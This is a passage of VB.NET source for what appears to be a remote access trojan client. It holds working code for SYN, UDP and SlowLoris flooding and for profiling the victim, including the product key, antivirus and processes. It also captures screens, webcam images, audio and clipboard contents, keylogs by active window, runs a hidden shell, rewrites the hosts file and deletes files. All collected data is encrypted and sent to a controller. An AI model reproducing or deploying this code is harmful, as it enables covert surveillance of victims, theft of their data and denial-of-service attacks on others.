660 regkey.DeleteValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
661 End If
662
663 If startupuser = True Then
664 Dim regkey As RegistryKey
665 regkey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
666 regkey.DeleteValue(New IO.FileInfo(Application.ExecutablePath).Name.Replace(".exe", ""))
667 End If
668
669 System.Diagnostics.Process.Start(p)
670 Application.Exit()
671 Catch ex As Exception
672 MsgBox(ex.Message)
673 End Try
674 End Sub
675 Sub removefromstartup(ByVal txt As String)
676 Try
677 If txt.StartsWith("C") Then
678 IO.File.Delete(txt.Replace("|", ""))
679 ElseIf txt.StartsWith("HKEY_CURRENT_USER") Then
680 txt = txt.Replace(txt.Split("\")(0) & "\", "")
681 Dim name As String = txt.Split("|")(1)
682 txt = txt.Replace("\|" & txt.Split("|")(1), "")
683 Dim regkey As RegistryKey = Registry.CurrentUser.OpenSubKey(txt, True)
684 regkey.DeleteValue(name)
685 regkey.Close()
686 ElseIf txt.StartsWith("HKEY_LOCAL_MACHINE") Then
687 txt = txt.Replace(txt.Split("\")(0) & "\", "")
688 Dim name As String = txt.Split("|")(1)
689 txt = txt.Replace("\|" & txt.Split("|")(1), "")
690 Dim regkey As RegistryKey = Registry.LocalMachine.OpenSubKey(txt, True)
691 regkey.DeleteValue(name)
692 regkey.Close()
693 End If
694 Catch
695 End Try
696 End Sub
697 Sub UploadFile(ByVal txt As String)
698 Try
699 'MsgBox(txt.Split("|")(0))
700 'IO.File.WriteAllBytes(txt.Split("|")(0), Convert.FromBase64String(txt.Replace(txt.Split("|")(0) & "|", "")))
701 Catch
702 End Try
703 End Sub
704 Sub StartSlowLoris(ByVal params As String)
705 Try
706 sl.Target = params.Split("|")(0)
707 sl.AOSockets = params.Split("|")(1)
708 sl.AOThreads = params.Split("|")(2)
709 sl.Start()
710 Catch
711 End Try
712 End Sub
713 Sub StartUDP(ByVal params As String)
714 Try
715 If UDPFlood.FloodRunning = True Then
716 Exit Sub
717 Else
718 UDPFlood.Host = params.Split("|")(0)
719 UDPFlood.Port = params.Split("|")(1)
720 UDPFlood.Threads = params.Split("|")(2)
721 UDPFlood.StartUDPFlood()
722 End If
723 Catch
724 End Try
725 End Sub
726 Sub StartSYN(ByVal params As String)
727 Try
728 If SynFlood.IsRunning = True Then
729 Exit Sub
730 Else
731 SynFlood.Host = params.Split("|")(0)
732 SynFlood.Port = params.Split("|")(1)
733 SynFlood.SynSockets = params.Split("|")(2)
734 SynFlood.Threads = params.Split("|")(3)
735 SynFlood.StartSynFlood()
736 End If
737 Catch
738 End Try
739 End Sub
740 Public Function HideTaskBar() As Boolean
741 Try
742 Dim lRet As Long
743 lRet = FindWindow("Shell_traywnd", "")
744 If lRet > 0 Then
745 lRet = SetWindowPos(lRet, 0, 0, 0, 0, 0, SWP_HIDEWINDOW)
746 HideTaskBar = lRet > 0
747 End If
748 Return True
749 Catch
750 Return False
751 End Try
752 End Function
753 Public Function ShowTaskBar() As Boolean
754 Try
755 Dim lRet As Long
756 lRet = FindWindow("Shell_traywnd", "")
757 If lRet > 0 Then
758 lRet = SetWindowPos(lRet, 0, 0, 0, 0, 0, SWP_SHOWWINDOW)
759 ShowTaskBar = lRet > 0
760 End If
761 Return True
762 Catch
763 Return False
764 End Try
765 End Function
766#End Region
767#Region "Information Gathering"
768#Region "Get Country"
769 <DllImport("kernel32.dll")>
770 Private Shared Function GetLocaleInfo(ByVal Locale As UInteger, ByVal LCType As UInteger, <Out()> ByVal lpLCData As System.Text.StringBuilder, ByVal cchData As Integer) As Integer
771 End Function
772
773 Private Const LOCALE_SYSTEM_DEFAULT As UInteger = &H400
774 Private Const LOCALE_SENGCOUNTRY As UInteger = &H1002
775
776 Private Shared Function GetInfo() As String
777 Dim lpLCData As Object = New System.Text.StringBuilder(256)
778 Dim ret As Integer = GetLocaleInfo(LOCALE_SYSTEM_DEFAULT, LOCALE_SENGCOUNTRY, lpLCData, lpLCData.Capacity)
779 If ret > 0 Then
780 Dim s As String = lpLCData.ToString().Substring(0, ret - 1)
781 Return UCase(s.Substring(0, 3))
782 End If
783 Return String.Empty
784 End Function
785#End Region
786 Public Function getpriv() As String
787 Try
788 My.User.InitializeWithWindowsUser()
789
790 If My.User.IsAuthenticated() Then
791 If My.User.IsInRole(ApplicationServices.BuiltInRole.Administrator) Then
792 Return "Admin"
793 ElseIf My.User.IsInRole(ApplicationServices.BuiltInRole.User) Then
794 Return "User"
795 ElseIf My.User.IsInRole(ApplicationServices.BuiltInRole.Guest) Then
796 Return "Guest"
797 Else
798 Return "Unknown"
799 End If
800 End If
801 Return "Unknown"
802 Catch
803 Return "Unknown"
804 End Try
805 End Function
806 Sub sendprocess()
807 Dim p As New System.Diagnostics.Process()
808 Dim count As Integer = 0
809 Dim Listview1 As New ListView
810 For Each p In System.Diagnostics.Process.GetProcesses(My.Computer.Name)
811 On Error Resume Next
812 Listview1.Items.Add(p.ProcessName & ".exe")
813 Listview1.Items(count).SubItems.Add(FormatNumber(Math.Round(p.PrivateMemorySize64 / 1024), 0) & " K")
814 Listview1.Items(count).SubItems.Add(p.Responding)
815 Listview1.Items(count).SubItems.Add(p.StartTime.ToString().Trim)
816 Listview1.Items(count).SubItems.Add(p.Id)
817 count += 1
818 Next
819
820 Dim Items As String = ""
821 For Each item As ListViewItem In Listview1.Items
822 Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & "|" & item.SubItems(4).Text & vbNewLine
823 Next
824 Items = Items.Trim
825
826 Send(AES_Encrypt("GetProcess" & Items, enckey))
827 End Sub
828 Sub getinstalledsoftware()
829 Try
830
831 Dim regkey, subkey As Microsoft.Win32.RegistryKey
832 Dim value As String
833 Dim regpath As String = "Software\Microsoft\Windows\CurrentVersion\Uninstall"
834 Dim software As String = String.Empty
835 Dim softwarecount As Integer
836
837 regkey = My.Computer.Registry.LocalMachine.OpenSubKey(regpath)
838 Dim subkeys() As String = regkey.GetSubKeyNames
839 Dim includes As Boolean
840 For Each subk As String In subkeys
841 subkey = regkey.OpenSubKey(subk)
842 value = subkey.GetValue("DisplayName", "")
843 If value <> "" Then
844 includes = True
845 If value.IndexOf("Hotfix") <> -1 Then includes = False
846 If value.IndexOf("Security Update") <> -1 Then includes = False
847 If value.IndexOf("Update for") <> -1 Then includes = False
848 If includes = True Then
849 software += value & "|" & vbCrLf
850 softwarecount += 1
851 End If
852 End If
853 Next
854
855 Dim final As String = "Software|" & softwarecount & "|" & software
856 Send(AES_Encrypt(final, enckey))
857 Catch
858 End Try
859 End Sub
860#Region "System Information"
861 Function getsystem() As String
862 Try
863 Return SystemInformation.ComputerName.ToString() & "|" &
864 SystemInformation.UserName.ToString() & "|" &
865 SystemInformation.VirtualScreen.Width & "|" &
866 SystemInformation.VirtualScreen.Height & "|" &
867 FormatNumber(My.Computer.Info.AvailablePhysicalMemory / 1024 / 1024 / 1024, 2) & " GB|" &
868 FormatNumber(My.Computer.Info.AvailableVirtualMemory / 1024 / 1024 / 1024, 2) & " GB|" &
869 My.Computer.Info.OSFullName & "|" &
870 My.Computer.Info.OSPlatform & "|" &
871 My.Computer.Info.OSVersion & "|" &
872 FormatNumber(My.Computer.Info.TotalPhysicalMemory / 1024 / 1024 / 1024, 2) & " GB|" &
873 FormatNumber(My.Computer.Info.TotalVirtualMemory / 1024 / 1024 / 1024, 2) & " GB|" &
874 SystemInformation.PowerStatus.BatteryChargeStatus.ToString() & "|" &
875 SystemInformation.PowerStatus.BatteryFullLifetime.ToString() & "|" &
876 SystemInformation.PowerStatus.BatteryLifePercent.ToString() & "|" &
877 SystemInformation.PowerStatus.BatteryLifeRemaining.ToString() & "|" &
878 GetCPUInfo() & "|" & GetGPUName() & "|" &
879 "(Started: " & StartUp() & ") & (Uptime: " & getUptime() & ")"
880 Catch
881 Return "N/A"
882 End Try
883 End Function
884 Private Function StartUp() As String
885 Try
886 Dim StartDate As DateTime
887 Dim envTicks As Long = Environment.TickCount
888 Dim msToAdd As Long = envTicks - (envTicks * 2)
889 StartDate = DateTime.Now.AddMilliseconds(msToAdd)
890 Return StartDate.ToString
891 Catch
892 Return Nothing
893 End Try
894 End Function
895 Public Function getUptime() As String
896 Try
897 Dim time As String = String.Empty
898 time += Math.Round(Environment.TickCount / 86400000) & " days, "
899 time += Math.Round(Environment.TickCount / 3600000 Mod 24) & " hours, "
900 time += Math.Round(Environment.TickCount / 120000 Mod 60) & " minutes, "
901 time += Math.Round(Environment.TickCount / 1000 Mod 60) & " seconds."
902 Return time
903 Catch
904 Return Nothing
905 End Try
906 End Function
907 Private Function GetCPUInfo() As String
908 Try
909 Dim cpuName As String = Registry.LocalMachine.OpenSubKey("HARDWARE\DESCRIPTION\System\CentralProcessor\0").GetValue("ProcessorNameString")
910 Return cpuName.Replace(" ", " ").Replace(" ", " ")
911 Catch
912 Return Nothing
913 End Try
914 End Function
915 Private Function GetGPUName() As String
916 Dim GraphicsCardName As String = String.Empty
917 Try
918 Dim WmiSelect As New ManagementObjectSearcher _
919 ("root\CIMV2", "SELECT * FROM Win32_VideoController")
920 For Each WmiResults As ManagementObject In WmiSelect.Get()
921 GraphicsCardName = WmiResults.GetPropertyValue("Name").ToString
922 If (Not String.IsNullOrEmpty(GraphicsCardName)) Then
923 Exit For
924 End If
925 Next
926 Catch err As ManagementException
927 End Try
928 Return GraphicsCardName
929 End Function
930#End Region
931#Region "Deep Information"
932 Function GetDeepInfo() As String
933 Try
934 Dim devices As String = String.Empty
935
936 Dim strName As String = Space(100)
937 Dim strVer As String = Space(100)
938 Dim bReturn As Boolean
939 Dim x As Integer = 0
940 Do
941 bReturn = capGetDriverDescriptionA(x, strName, 100, strVer, 100)
942 If bReturn Then devices += strName.Trim & "|"
943 x += 1
944 Loop Until bReturn = False
945
946 Dim res As String = String.Empty
947 If devices <> "" Then
948 res = "Yes" : Else : res = "No"
949 End If
950
951 Return "|" & My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion", "RegisteredOwner", "N/A") & "|" &
952 My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion", "RegisteredOrganization", "N/A") & "|" &
953 My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Win8", "ProductKey", "N/A") & "|" & NetworkInterface.GetAllNetworkInterfaces()(0).GetPhysicalAddress().ToString & "|" &
954 res & "|" & GetAV() & "|" & Application.ExecutablePath
955 Catch
956 Return ""
957 End Try
958 End Function
959 Function GetAV() As String
960 Dim wmiQuery As Object = "Select * From AntiVirusProduct"
961 Dim objWMIService As Object = GetObject("winmgmts:\\.\root\SecurityCenter2")
962 Dim colItems As Object = objWMIService.ExecQuery(wmiQuery)
963 For Each objItem As Object In colItems
964 On Error Resume Next
965 Return objItem.displayName.ToString()
966 Next
967 Return Nothing
968 End Function
969#End Region
970 Function GetTCPConnections() As String
971 Try
972 Dim s As String = String.Empty
973
974 Dim properties As IPGlobalProperties = IPGlobalProperties.GetIPGlobalProperties()
975 Dim connections() As TcpConnectionInformation = properties.GetActiveTcpConnections()
976
977 For Each c As TcpConnectionInformation In connections
978 s += String.Format("{0}|{1}|{2}", c.LocalEndPoint, c.RemoteEndPoint, c.State) & vbCrLf
979 Next
980
981 Return s.Trim
982 Catch
983 Return Nothing
984 End Try
985 End Function
986 Private Sub GetStartupEntries()
987 Try
988 Dim x As String = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
989
990 Dim dir As DirectoryInfo = New DirectoryInfo(x)
991 Dim files() As FileInfo = dir.GetFiles
992
993 Dim regkeys(3) As RegistryKey
994
995 regkeys(0) = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run")
996 regkeys(1) = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce")
997 regkeys(2) = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run")
998 regkeys(3) = Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\RunOnce")
999
1000 Dim result As String = String.Empty
1001
1002 For Each File As FileInfo In files
1003 result += String.Format("{0}|{1}|{2}", x, File.Name, x & "\" & File.Name) & vbCrLf
1004 Next
1005
1006 For i As Integer = 0 To 3
1007 For Each valueName As String In regkeys(i).GetValueNames()
1008 result += String.Format("{0}|{1}|{2}", regkeys(i).ToString, valueName, regkeys(i).GetValue(valueName)) & vbCrLf
1009 Next
1010 Next
1011
1012 result = result.Trim
1013 Send(AES_Encrypt("Strtp" & result, enckey))
1014 Catch
1015 End Try
1016 End Sub
1017 Sub SendServices()
1018 Dim Listview1 As New ListView
1019 Dim scServices() As ServiceController = ServiceController.GetServices()
1020
1021 For i As Integer = 0 To UBound(scServices)
1022 With Listview1.Items.Add(scServices(i).ServiceName)
1023 .SubItems.Add(scServices(i).DisplayName)
1024 .SubItems.Add(scServices(i).ServiceType.ToString)
1025 .SubItems.Add(scServices(i).Status.ToString)
1026 End With
1027 Next
1028
1029 Dim Items As String = ""
1030 For Each item As ListViewItem In Listview1.Items
1031 Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & vbNewLine
1032 Next
1033 Items = Items.Trim
1034
1035 Send(AES_Encrypt("Services" & Items, enckey))
1036 End Sub
1037 Sub PerformServiceAction(ByVal number As Integer, ByVal Action As String)
1038 Try
1039 Dim scServices() As ServiceController = ServiceController.GetServices()
1040 Select Case Action
1041 Case "Close"
1042 scServices(number).Close()
1043 Case "Continue"
1044 scServices(number).Continue()
1045 Case "Pause"
1046 scServices(number).Pause()
1047 Case "Start"
1048 scServices(number).Start()
1049 Case "Stop"
1050 scServices(number).Stop()
1051 End Select
1052 Catch : End Try
1053 End Sub
1054#End Region
1055#Region "Encryption"
1056 Public Function AES_Encrypt(ByVal input As String, ByVal pass As String) As String
1057 Dim AES As New System.Security.Cryptography.RijndaelManaged
1058 Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
1059 Dim encrypted As String = ""
1060 Try
1061 Dim hash(31) As Byte
1062 Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
1063 Array.Copy(temp, 0, hash, 0, 16)
1064 Array.Copy(temp, 0, hash, 15, 16)
1065 AES.Key = hash
1066 AES.Mode = System.Security.Cryptography.CipherMode.ECB
1067 Dim DESEncrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateEncryptor
1068 Dim Buffer As Byte() = System.Text.ASCIIEncoding.ASCII.GetBytes(input)
1069 encrypted = Convert.ToBase64String(DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
1070 Return encrypted
1071 Catch
1072 Return Nothing
1073 End Try
1074 End Function
1075 Public Function AES_Decrypt(ByVal input As String, ByVal pass As String) As String
1076 Dim AES As New System.Security.Cryptography.RijndaelManaged
1077 Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
1078 Dim decrypted As String = ""
1079 Try
1080 Dim hash(31) As Byte
1081 Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
1082 Array.Copy(temp, 0, hash, 0, 16)
1083 Array.Copy(temp, 0, hash, 15, 16)
1084 AES.Key = hash
1085 AES.Mode = System.Security.Cryptography.CipherMode.ECB
1086 Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor
1087 Dim Buffer As Byte() = Convert.FromBase64String(input)
1088 decrypted = System.Text.ASCIIEncoding.ASCII.GetString(DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
1089 Return decrypted
1090 Catch
1091 Return Nothing
1092 End Try
1093 End Function
1094#End Region
1095#Region "Surveillance"
1096#Region "Remote Desktop"
1097 Sub sendscreen()
1098 Try
1099
1100 Dim width As Integer = res.Split("x")(0)
1101 Dim height As Integer = res.Split("x")(1)
1102
1103 Dim b As New System.Drawing.Bitmap(My.Computer.Screen.Bounds.Width, My.Computer.Screen.Bounds.Height)
1104 Dim g As System.Drawing.Graphics = System.Drawing.Graphics.FromImage(b)
1105 g.CopyFromScreen(0, 0, 0, 0, b.Size)
1106 g.Dispose()
1107
1108 Dim p, pp As New PictureBox
1109 p.Image = b
1110 Dim img As System.Drawing.Image = p.Image
1111 pp.Image = img.GetThumbnailImage(width, height, Nothing, Nothing)
1112 Dim img2 As System.Drawing.Image = pp.Image
1113
1114 Dim bmp1 As New System.Drawing.Bitmap(img2)
1115 Dim jgpEncoder As System.Drawing.Imaging.ImageCodecInfo = GetEncoder(System.Drawing.Imaging.ImageFormat.Jpeg)
1116 Dim myEncoder As System.Drawing.Imaging.Encoder = System.Drawing.Imaging.Encoder.Quality
1117 Dim myEncoderParameters As New System.Drawing.Imaging.EncoderParameters(1)
1118 Dim myEncoderParameter As New System.Drawing.Imaging.EncoderParameter(myEncoder, comp)
1119 myEncoderParameters.Param(0) = myEncoderParameter
1120 bmp1.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg", jgpEncoder, myEncoderParameters)
1121 Send(AES_Encrypt("RemoteDesktop" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg")), enckey))
1122 IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\scr.jpg")
1123 Catch
1124 End Try
1125 End Sub
1126 Private Function GetEncoder(ByVal format As System.Drawing.Imaging.ImageFormat) As System.Drawing.Imaging.ImageCodecInfo
1127 Try
1128 Dim codecs As System.Drawing.Imaging.ImageCodecInfo() = System.Drawing.Imaging.ImageCodecInfo.GetImageDecoders()
1129 Dim codec As System.Drawing.Imaging.ImageCodecInfo
1130 For Each codec In codecs
1131 If codec.FormatID = format.Guid Then
1132 Return codec
1133 End If
1134 Next codec
1135 Return Nothing
1136 Catch
1137 Return Nothing
1138 End Try
1139 End Function
1140#End Region
1141 Sub MouseMov(ByVal txt As String)
1142 Try
1143 If txt.StartsWith("Left") Then
1144 Dim x As Integer = txt.Replace("LeftSetCurPos", "").Split("x")(0)
1145 Dim y As Integer = txt.Replace("LeftSetCurPos", "").Split("x")(1)
1146
1147 SetCursorPos(x, y)
1148 mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
1149 mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
1150 ElseIf txt.StartsWith("Right") Then
1151 Dim x As Integer = txt.Replace("RightSetCurPos", "").Split("x")(0)
1152 Dim y As Integer = txt.Replace("RightSetCurPos", "").Split("x")(1)
1153
1154 SetCursorPos(x, y)
1155 mouse_event(MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)
1156 mouse_event(MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0)
1157 End If
1158 Catch
1159 End Try
1160 End Sub
1161#Region "Audio"
1162 Sub audio_start()
1163 Try
1164 Dim i As Integer
1165 i = mciSendString("open new type waveaudio alias capture", Nothing, 0, 0)
1166 i = mciSendString("record capture", Nothing, 0, 0)
1167 Catch
1168 End Try
1169 End Sub
1170 Sub audio_stop()
1171 Try
1172 Dim i As Integer
1173 i = mciSendString("save capture " & My.Computer.FileSystem.SpecialDirectories.Temp.ToString & "\rec.wav", Nothing, 0, 0)
1174 i = mciSendString("close capture", Nothing, 0, 0)
1175 Catch
1176 End Try
1177 End Sub
1178 Sub audio_get()
1179 Try
1180 Send(AES_Encrypt("RecordingFile" & SystemInformation.ComputerName & "|" & Convert.ToBase64String(File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\rec.wav")), enckey))
1181 File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\rec.wav")
1182 Catch
1183 End Try
1184 End Sub
1185#End Region
1186#Region "Webcam"
1187 Sub listdevices()
1188 Try
1189 Dim devices As String = String.Empty
1190
1191 Dim strName As String = Space(100)
1192 Dim strVer As String = Space(100)
1193 Dim bReturn As Boolean
1194 Dim x As Integer = 0
1195 Do
1196 bReturn = capGetDriverDescriptionA(x, strName, 100, strVer, 100)
1197 If bReturn Then devices += strName.Trim & "|"
1198 x += 1
1199 Loop Until bReturn = False
1200 Send(AES_Encrypt("WebcamDevices" & devices, enckey))
1201 Catch
1202 End Try
1203 End Sub
1204 Sub getwebcam()
1205 Try
1206 Dim iHeight As Integer = picCapture.Height
1207 Dim iWidth As Integer = picCapture.Width
1208 hHwnd = capCreateCaptureWindowA(iDevice, WS_VISIBLE Or WS_CHILD, 0, 0, 640, 480, picCapture.Handle.ToInt32, 0)
1209
1210 If SendWebcam(hHwnd, WM_CAP_DRIVER_CONNECT, iDevice, 0) Then
1211 SendWebcam(hHwnd, WM_CAP_SET_SCALE, True, 0)
1212 SendWebcam(hHwnd, WM_CAP_SET_PREVIEWRATE, 66, 0)
1213 SendWebcam(hHwnd, WM_CAP_SET_PREVIEW, True, 0)
1214 SetWebcamPos(hHwnd, HWND_BOTTOM, 0, 0, picCapture.Width, picCapture.Height, SWP_NOMOVE Or SWP_NOZORDER)
1215
1216 Dim data As IDataObject
1217 Dim bmap As System.Drawing.Image
1218 SendWebcam(hHwnd, WM_CAP_EDIT_COPY, 0, 0)
1219 data = Clipboard.GetDataObject()
1220 If data.GetDataPresent(GetType(System.Drawing.Bitmap)) Then
1221 bmap = CType(data.GetData(GetType(System.Drawing.Bitmap)), System.Drawing.Image)
1222 picCapture.Image = bmap
1223
1224 SendWebcam(hHwnd, WM_CAP_DRIVER_DISCONNECT, iDevice, 0)
1225
1226 bmap.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png", System.Drawing.Imaging.ImageFormat.Png)
1227 Send(AES_Encrypt("WebcamSnap" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png")), enckey))
1228 IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\wcs.png")
1229 End If
1230 Else
1231 DestroyWebcam(hHwnd)
1232 End If
1233 Catch
1234 End Try
1235 End Sub
1236#End Region
1237 Sub SendThumbNail()
1238 Try
1239
1240 Dim b As New System.Drawing.Bitmap(My.Computer.Screen.Bounds.Width, My.Computer.Screen.Bounds.Height)
1241 Dim g As System.Drawing.Graphics = System.Drawing.Graphics.FromImage(b)
1242 g.CopyFromScreen(0, 0, 0, 0, b.Size)
1243 g.Dispose()
1244
1245 Dim p, pp As New PictureBox
1246 p.Image = b
1247 Dim img As System.Drawing.Image = p.Image
1248 pp.Image = img.GetThumbnailImage(242, 152, Nothing, Nothing)
1249 Dim img2 As System.Drawing.Image = pp.Image
1250
1251 Dim bmp1 As New System.Drawing.Bitmap(img2)
1252 Dim jgpEncoder As System.Drawing.Imaging.ImageCodecInfo = GetEncoder(System.Drawing.Imaging.ImageFormat.Jpeg)
1253 Dim myEncoder As System.Drawing.Imaging.Encoder = System.Drawing.Imaging.Encoder.Quality
1254 Dim myEncoderParameters As New System.Drawing.Imaging.EncoderParameters(1)
1255 Dim myEncoderParameter As New System.Drawing.Imaging.EncoderParameter(myEncoder, 100L)
1256 myEncoderParameters.Param(0) = myEncoderParameter
1257 bmp1.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg", jgpEncoder, myEncoderParameters)
1258 Send(AES_Encrypt("ThumbNail" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg")), enckey))
1259 IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\thumb.jpg")
1260 Catch
1261 End Try
1262 End Sub
1263#End Region
1264#Region "Miscellaneous"
1265 Sub loadhostsfile()
1266 Try
1267 Send(AES_Encrypt("HostsFile" & IO.File.ReadAllText("C:\Windows\system32\drivers\etc\hosts"), enckey))
1268 Catch
1269 End Try
1270 End Sub
1271 Sub savehostsfile(ByVal txt As String)
1272 Try
1273 IO.File.WriteAllText("C:\Windows\system32\drivers\etc\hosts", txt)
1274 Catch
1275 End Try
1276 End Sub
1277 Sub getclipboardimage()
1278 Try
1279 If My.Computer.Clipboard.ContainsImage() Then
1280 Dim img As New PictureBox
1281 img.Image = My.Computer.Clipboard.GetImage()
1282 img.Image.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1283 Else
1284 Dim Bmp As New System.Drawing.Bitmap(397, 187, Imaging.PixelFormat.Format32bppPArgb)
1285 Bmp.SetResolution(397, 187)
1286 Dim G As System.Drawing.Graphics = Graphics.FromImage(Bmp)
1287 G.Clear(Color.White)
1288 G.InterpolationMode = Drawing2D.InterpolationMode.HighQualityBicubic
1289 G.SmoothingMode = Drawing2D.SmoothingMode.AntiAlias
1290 G.TextRenderingHint = Drawing.Text.TextRenderingHint.AntiAlias
1291 Dim F As New Font("Arial", 3)
1292 Dim B As New SolidBrush(Color.Red)
1293 G.DrawString("The Clipboard does not have any Images!", F, B, 12, 12)
1294
1295 Bmp.Save(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1296 End If
1297
1298 Send(AES_Encrypt("CPImage" & Convert.ToBase64String(IO.File.ReadAllBytes(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")), enckey))
1299 IO.File.Delete(My.Computer.FileSystem.SpecialDirectories.Temp & "\cp.jpg")
1300 Catch
1301 End Try
1302 End Sub
1303 Sub getclipboardtext()
1304 Try
1305 If My.Computer.Clipboard.ContainsText() = True Then
1306 Send(AES_Encrypt("CPText" & My.Computer.Clipboard.GetText(), enckey))
1307 End If
1308 Catch
1309 End Try
1310 End Sub
1311 Sub setclipboardtext(ByVal text As String)
1312 Try
1313 My.Computer.Clipboard.SetText(text)
1314 Catch
1315 End Try
1316 End Sub
1317 Sub runshell(cmd As String)
1318 Try
1319 Dim p As New System.Diagnostics.Process
1320 Dim i As New System.Diagnostics.ProcessStartInfo("cmd")
1321 i.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden
1322 i.Arguments = "/C " & cmd
1323 i.RedirectStandardOutput = True
1324 i.UseShellExecute = False
1325 i.CreateNoWindow = True
1326 i.ErrorDialog = False
1327 p.StartInfo = i
1328 p.Start()
1329 Dim output As String = p.StandardOutput.ReadToEnd
1330
1331 Send(AES_Encrypt("Shell" & output, enckey))
1332 Catch
1333 End Try
1334 End Sub
1335#End Region
1336 Private Function GetActiveWindowTitle() As String
1337 Dim MyStr As String
1338 MyStr = New String(Chr(0), 100)
1339 GetWindowText(GetForegroundWindow, MyStr, 100)
1340 MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1)
1341 Return MyStr
1342 End Function
1343 Private Sub logger_Down(Key As String) Handles logger.Down
1344 Call APPU()
1345 logs &= Key
1346 End Sub
1347 Sub APPU()
1348 If strin <> GetActiveWindowTitle() Then
1349 logs = logs & vbCrLf & vbCrLf & "[" & My.Computer.Clock.LocalTime.Date & " " & My.Computer.Clock.LocalTime.Hour & ":" & My.Computer.Clock.LocalTime.Minute & ":" & My.Computer.Clock.LocalTime.Second & " | " & GetActiveWindowTitle() & "]" + vbNewLine & vbNewLine
1350 strin = GetActiveWindowTitle()
1351 End If
1352 End Sub
1353 Sub listdrives()
1354 Try
1355 Dim drives As String = String.Empty
1356 For Each drive As IO.DriveInfo In IO.DriveInfo.GetDrives
1357 Dim ltr As String = drive.Name
1358 If drive.IsReady AndAlso drive.VolumeLabel <> "" Then
1359 Else
1360 End If
1361 drives += ltr & "|"
1362 Next
1363 Send(AES_Encrypt("Drives" & drives, enckey))
1364 Catch
1365 End Try
1366 End Sub
1367 Sub showfiles(path As String)
1368 Try
1369 listviewfiles.Items.Clear()
1370 curntdir2 = ""
1371 For Each Dir As String In Directory.GetDirectories(path)
1372 Dir = Dir.Replace(path, "")
1373 Dim d As New DirectoryInfo(path & Dir & "\")
1374 With listviewfiles.Items.Add(Dir, 0)
1375 .SubItems.Add(d.CreationTime)
1376 .SubItems.Add(d.LastAccessTime)
1377 .SubItems.Add("")
1378 .SubItems.Add("1")
1379 End With
1380 Next
1381
1382 Dim file As String
1383 file = Dir$(path)
1384 Do While Len(file)
1385 Dim f As New FileInfo(path & file)
1386 With listviewfiles.Items.Add(file)
1387 .SubItems.Add(f.CreationTime)
1388 .SubItems.Add(f.LastAccessTime)
1389 .SubItems.Add(Format((f.Length / 1024) / 1024, "###,###,##0.00") & " MB")
1390 .SubItems.Add("0")
1391 End With
1392 file = Dir$()
1393 Loop
1394 curntdir2 = path
1395
1396 Dim Items As String = curntdir2 & "|"
1397 For Each item As ListViewItem In listviewfiles.Items
1398 Items = Items & item.Text & "|" & item.SubItems(1).Text & "|" & item.SubItems(2).Text & "|" & item.SubItems(3).Text & "|" & item.SubItems(4).Text & vbNewLine
1399 Next
1400 Items = Items.Trim
1401
1402 Send(AES_Encrypt("FileManagerFiles" & Items, enckey))
1403 Catch
1404 End Try
1405 End Sub
1406 Sub createnewdirectory(ByVal path As String)
1407 Try
1408 My.Computer.FileSystem.CreateDirectory(path)
1409 Catch
1410 End Try
1411 End Sub
1412 Sub deletedirectory(ByVal path As String)
1413 Try
1414 My.Computer.FileSystem.DeleteDirectory(path, FileIO.DeleteDirectoryOption.DeleteAllContents)
1415 Catch
1416 End Try
1417 End Sub
1418 Sub renamedirectory(ByVal path As String, ByVal newname As String)
1419 Try
1420 My.Computer.FileSystem.RenameDirectory(path, newname)
1421 Catch
1422 End Try
1423 End Sub
1424 Sub movedirectory(ByVal oldpath As String, ByVal newpath As String, ByVal name As String)
1425 Try
